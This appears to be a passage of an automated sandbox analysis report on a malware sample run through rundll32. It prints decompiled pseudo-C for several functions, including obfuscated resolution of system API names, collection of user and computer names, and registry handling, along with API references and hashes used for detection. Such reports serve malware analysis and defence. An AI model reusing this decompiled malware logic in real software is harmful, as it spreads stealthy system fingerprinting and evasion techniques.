                                                  Function 04F48307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E04F48307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4f4d27c; // 0x212a5a8
				_t1 = _t9 + 0x4f4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04F49401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04F42049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04F47225(_t34, _t41, _a8);
						E04F49039(_t41);
						_t42 = E04F48E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04F49039(_t36);
							_t36 = _t42;
						}
						_t43 = E04F4788B(_t36, _t33);
						if(_t43 != 0) {
							E04F49039(_t36);
							_t36 = _t43;
						}
					}
					E04F49039(_t28);
				}
				return _t36;
			}














                                                  0x04f48307
                                                  0x04f4830a
                                                  0x04f4830b
                                                  0x04f48313
                                                  0x04f4831a
                                                  0x04f48321
                                                  0x04f48325
                                                  0x04f4832b
                                                  0x04f48332
                                                  0x04f48337
                                                  0x04f48349
                                                  0x04f4834d
                                                  0x04f48351
                                                  0x04f48357
                                                  0x04f4835c
                                                  0x04f4836c
                                                  0x04f4836e
                                                  0x04f48385
                                                  0x04f48389
                                                  0x04f4838c
                                                  0x04f48391
                                                  0x04f48391
                                                  0x04f4839a
                                                  0x04f4839e
                                                  0x04f483a1
                                                  0x04f483a6
                                                  0x04f483a6
                                                  0x04f4839e
                                                  0x04f483a9
                                                  0x04f483a9
                                                  0x04f483b4

                                                  APIs
                                                    • Part of subcall function 04F49401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04F48321,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?), ref: 04F49468
                                                    • Part of subcall function 04F49401: sprintf.NTDLL ref: 04F49489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                  • lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • strcpy.NTDLL ref: 04F48351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F47225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04F4836B,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F4723C
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                    • Part of subcall function 04F48E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F48385,00000000,?,?,04F4A428,?,070795B0), ref: 04F48E8C
                                                    • Part of subcall function 04F48E82: _snprintf.NTDLL ref: 04F48EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: ebfa84bd5f873fafedf5a7bdea95a0ab02f565481bd95a4e868c1a89f7a17a27
                                                  • Instruction ID: dc1d0d637e44ff8c75d143597e585c459bfaf2a0ffb8db708364a1fefdc0578f
                                                  • Opcode Fuzzy Hash: ebfa84bd5f873fafedf5a7bdea95a0ab02f565481bd95a4e868c1a89f7a17a27
                                                  • Instruction Fuzzy Hash: 7F11C677A01225B767227BB9AC84C7F3E9DDFC56A8705401AF50497100DE79ED0357E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F46CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04F46D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 04F46D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04F46D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DC3
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: bf505eb7646bcd4616ff9d8d2d1a21b210069209237f14327fc29d0de4e3bc27
                                                  • Instruction ID: da124c51669f26e8d6e89964884bbcf9547706b6244ad4afba52463901d8895a
                                                  • Opcode Fuzzy Hash: bf505eb7646bcd4616ff9d8d2d1a21b210069209237f14327fc29d0de4e3bc27
                                                  • Instruction Fuzzy Hash: 53313D36D00609ABEB01DFBCD844A9FBBB6EF89314F154465E910EB220DB75A906CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F4692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04F42049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4f4d27c; // 0x212a5a8
					_t1 = _t23 + 0x4f4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4f4d27c; // 0x212a5a8
					_t2 = _t26 + 0x4f4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04F49039(_t54);
					} else {
						_t30 =  *0x4f4d27c; // 0x212a5a8
						_t5 = _t30 + 0x4f4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4f4d27c; // 0x212a5a8
							_t7 = _t33 + 0x4f4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4f4d27c; // 0x212a5a8
								_t9 = _t36 + 0x4f4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4f4d27c; // 0x212a5a8
									_t11 = _t39 + 0x4f4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04F4727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x04f4693b
                                                  0x04f4693f
                                                  0x04f46a01
                                                  0x04f46945
                                                  0x04f46945
                                                  0x04f4694a
                                                  0x04f4695d
                                                  0x04f4695f
                                                  0x04f46964
                                                  0x04f4696c
                                                  0x04f46973
                                                  0x04f46977
                                                  0x04f4697a
                                                  0x04f469f9
                                                  0x04f469fa
                                                  0x04f4697c
                                                  0x04f4697c
                                                  0x04f46981
                                                  0x04f46989
                                                  0x04f4698d
                                                  0x04f46990
                                                  0x00000000
                                                  0x04f46992
                                                  0x04f46992
                                                  0x04f46997
                                                  0x04f4699f
                                                  0x04f469a3
                                                  0x04f469a6
                                                  0x00000000
                                                  0x04f469a8
                                                  0x04f469a8
                                                  0x04f469ad
                                                  0x04f469b5
                                                  0x04f469b9
                                                  0x04f469bc
                                                  0x00000000
                                                  0x04f469be
                                                  0x04f469be
                                                  0x04f469c3
                                                  0x04f469cb
                                                  0x04f469cf
                                                  0x04f469d2
                                                  0x00000000
                                                  0x04f469d4
                                                  0x04f469da
                                                  0x04f469df
                                                  0x04f469e6
                                                  0x04f469ed
                                                  0x04f469f0
                                                  0x00000000
                                                  0x04f469f2
                                                  0x04f469f5
                                                  0x04f469f5
                                                  0x04f469f0
                                                  0x04f469d2
                                                  0x04f469bc
                                                  0x04f469a6
                                                  0x04f46990
                                                  0x04f4697a
                                                  0x04f46a0f

                                                  APIs
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F4207A,?,00000001,?,?,00000000,00000000), ref: 04F46951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F46973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F46989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F4699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F469B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F469CB
                                                    • Part of subcall function 04F4727B: memset.NTDLL ref: 04F472FA
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: ff1935a2acb60a17eda79d1761a73e0dca7ca33e500fd3f219cff7ceb3fc6c8b
                                                  • Instruction ID: 37ba8ecaaeefe3dc54f86f7eae0ca115bd73d1576d72baf6a19ead10d71d852b
                                                  • Opcode Fuzzy Hash: ff1935a2acb60a17eda79d1761a73e0dca7ca33e500fd3f219cff7ceb3fc6c8b
                                                  • Instruction Fuzzy Hash: 982132B560120ADFEB20DFBDD844D567BECEB993447018529E655C7601EF78FA018B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F47649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F47649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E04F42049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E04F49039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4f4a33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x04f47657
                                                  0x04f4765a
                                                  0x04f4765d
                                                  0x04f47663
                                                  0x04f47668
                                                  0x04f4766e
                                                  0x04f47676
                                                  0x04f47679
                                                  0x04f4767f
                                                  0x04f47684
                                                  0x04f47691
                                                  0x04f4769e
                                                  0x04f476a2
                                                  0x04f476a4
                                                  0x04f476a8
                                                  0x04f476ab
                                                  0x04f476bb
                                                  0x04f4770d
                                                  0x04f4770e
                                                  0x04f476bd
                                                  0x04f476c0
                                                  0x04f476c7
                                                  0x04f476ca
                                                  0x04f476dd
                                                  0x00000000
                                                  0x04f476df
                                                  0x04f476e2
                                                  0x04f476e7
                                                  0x04f476f5
                                                  0x04f476f8
                                                  0x04f47700
                                                  0x04f47703
                                                  0x00000000
                                                  0x04f47705
                                                  0x04f47705
                                                  0x04f47708
                                                  0x04f47708
                                                  0x04f47703
                                                  0x04f476dd
                                                  0x04f47713
                                                  0x04f47714
                                                  0x04f47684
                                                  0x04f4771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,04F4A338), ref: 04F4765D
                                                  • GetComputerNameW.KERNEL32(00000000,04F4A338), ref: 04F47679
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetUserNameW.ADVAPI32(00000000,04F4A338), ref: 04F476B3
                                                  • GetComputerNameW.KERNEL32(04F4A338,?), ref: 04F476D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04F4A338,00000000,04F4A33A,00000000,00000000,?,?,04F4A338), ref: 04F476F8
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 2319aab089c96302c2237cae18f16e780d3e0f88a29b5353c8ca140f04d3a667
                                                  • Instruction ID: dd9ff72dd6d1d0a91ca6691e59971c5925d68b9246a5e64bc5a919020c7ae315
                                                  • Opcode Fuzzy Hash: 2319aab089c96302c2237cae18f16e780d3e0f88a29b5353c8ca140f04d3a667
                                                  • Instruction Fuzzy Hash: 7F219776D00249FBDB11DFA9D984CEEBBF8EE84344B5444AAE501E7240EB34AF45DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F41585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E04F41585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04F47F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04F4A9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4f4d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x04f41585
                                                  0x04f41592
                                                  0x04f41594
                                                  0x04f415f7
                                                  0x00000000
                                                  0x04f415f7
                                                  0x04f415ac
                                                  0x04f415b3
                                                  0x04f415bf
                                                  0x04f415c4
                                                  0x04f415c6
                                                  0x04f415c8
                                                  0x04f415ca
                                                  0x04f415cc
                                                  0x04f415ce
                                                  0x04f415da
                                                  0x04f415ea
                                                  0x00000000
                                                  0x04f415dc
                                                  0x04f415dc
                                                  0x04f415e3
                                                  0x04f415f0
                                                  0x04f415f0
                                                  0x04f415f0
                                                  0x04f415e3
                                                  0x04f415da
                                                  0x04f415f5
                                                  0x00000000
                                                  0x00000000
                                                  0x04f415fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F415BF
                                                  • ResetEvent.KERNEL32(?), ref: 04F415C4
                                                  • GetLastError.KERNEL32 ref: 04F415DC
                                                  • GetLastError.KERNEL32(?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F415F7
                                                    • Part of subcall function 04F47F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000), ref: 04F47F33
                                                    • Part of subcall function 04F47F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?), ref: 04F47F91
                                                    • Part of subcall function 04F47F27: lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FA1
                                                  • SetEvent.KERNEL32(?), ref: 04F415EA
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: ab4c9079a6b67779f469ef31e32471aad369baeb977c453223940404737687e2
                                                  • Instruction ID: b72e9322e6c51a25e38314b3940a58beb82d949843973178ebc7c9a6a3333986
                                                  • Opcode Fuzzy Hash: ab4c9079a6b67779f469ef31e32471aad369baeb977c453223940404737687e2
                                                  • Instruction Fuzzy Hash: C701AD31501601ABE7306F61EE48B9BBFA8EFD4364F114A25F552D10E0EF20F886DA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F48F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F48F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4f4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4f4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4f4d258 = _t6;
					 *0x4f4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4f4d254 = _t7;
					if(_t7 == 0) {
						 *0x4f4d254 =  *0x4f4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x04f48f18
                                                  0x04f48f20
                                                  0x04f48f25
                                                  0x00000000
                                                  0x04f48f7a
                                                  0x04f48f27
                                                  0x04f48f2f
                                                  0x04f48f37
                                                  0x04f48f37
                                                  0x04f48f77
                                                  0x00000000
                                                  0x04f48f77
                                                  0x04f48f39
                                                  0x04f48f39
                                                  0x04f48f3e
                                                  0x04f48f50
                                                  0x04f48f55
                                                  0x04f48f5b
                                                  0x04f48f63
                                                  0x04f48f68
                                                  0x04f48f6a
                                                  0x04f48f6a
                                                  0x00000000
                                                  0x04f48f71
                                                  0x04f48f33
                                                  0x00000000
                                                  0x00000000
                                                  0x04f48f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F46A90,?,?,00000001,?,?,?,04F4807D,?), ref: 04F48F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F48F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F7A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 92162cbf15bc9c18ae17a606c162ed0c3ab35dfa4e859cddfe9d2864ae24e7e2
                                                  • Instruction ID: 0696cc3635ad035d1e45ce041f23a71bce553f53290c2cd9a96f4fe888f7ba43
                                                  • Opcode Fuzzy Hash: 92162cbf15bc9c18ae17a606c162ed0c3ab35dfa4e859cddfe9d2864ae24e7e2
                                                  • Instruction Fuzzy Hash: BCF04F7CA853499AF720AF68BD19B143FA2E7E47E0F014519E542CA6D0DF78A942CB34
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F417D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E04F417D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x4f4d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E04F4809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E04F488B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E04F49039(_a8);
						goto L29;
					}
					_t65 =  *0x4f4d27c; // 0x212a5a8
					_t16 = _t65 + 0x4f4e8fe; // 0x65696c43
					_t68 = E04F4809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d04f4c0
						if(E04F4A635(_t103,  *_t33, _t97, _a8,  *0x4f4d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4f4d27c; // 0x212a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x4f4ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4f4e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E04F4816C(_t73,  *0x4f4d334,  *0x4f4d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x4f4d27c; // 0x212a5a8
									_t44 = _t75 + 0x4f4e871; // 0x74666f53
									_t78 = E04F4809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d04f4c0
										E04F42659( *_t47, _t97, _a8,  *0x4f4d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d04f4c0
										E04F42659( *_t49, _t97, _t105,  *0x4f4d330, _a16);
										E04F49039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d04f4c0
									E04F42659( *_t40, _t97, _a8,  *0x4f4d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d04f4c0
									E04F42659( *_t43, _t97, _a8,  *0x4f4d330, _a16);
								}
								if( *_t107 != 0) {
									E04F49039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d04f4c0
					if(E04F46BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d04f4c0
							E04F4A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E04F49039(_t106);
						_t104 = _a16;
					}
					E04F49039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E04F4A8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x4f4d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x04f417d5
                                                  0x04f417de
                                                  0x04f417e5
                                                  0x04f417ea
                                                  0x04f41857
                                                  0x04f4185d
                                                  0x04f41862
                                                  0x04f4186b
                                                  0x04f41872
                                                  0x04f41875
                                                  0x04f419e9
                                                  0x04f419f0
                                                  0x04f419f0
                                                  0x04f419f5
                                                  0x04f419f7
                                                  0x04f419f7
                                                  0x04f41a00
                                                  0x04f41a00
                                                  0x04f4187b
                                                  0x04f41887
                                                  0x04f419df
                                                  0x04f419e2
                                                  0x00000000
                                                  0x04f419e2
                                                  0x04f4188d
                                                  0x04f41892
                                                  0x04f4189b
                                                  0x04f418a2
                                                  0x04f418a5
                                                  0x04f418ef
                                                  0x04f418ef
                                                  0x04f41902
                                                  0x04f4190c
                                                  0x04f41914
                                                  0x04f41919
                                                  0x04f41923
                                                  0x04f41923
                                                  0x04f4191b
                                                  0x04f4191b
                                                  0x04f4191b
                                                  0x04f4191b
                                                  0x04f41945
                                                  0x04f4194d
                                                  0x04f4197b
                                                  0x04f41980
                                                  0x04f41989
                                                  0x04f4198e
                                                  0x04f41992
                                                  0x04f419c4
                                                  0x04f41994
                                                  0x04f419a1
                                                  0x04f419a4
                                                  0x04f419b4
                                                  0x04f419b7
                                                  0x04f419bd
                                                  0x04f419bd
                                                  0x04f4194f
                                                  0x04f4195c
                                                  0x04f4195f
                                                  0x04f41971
                                                  0x04f41974
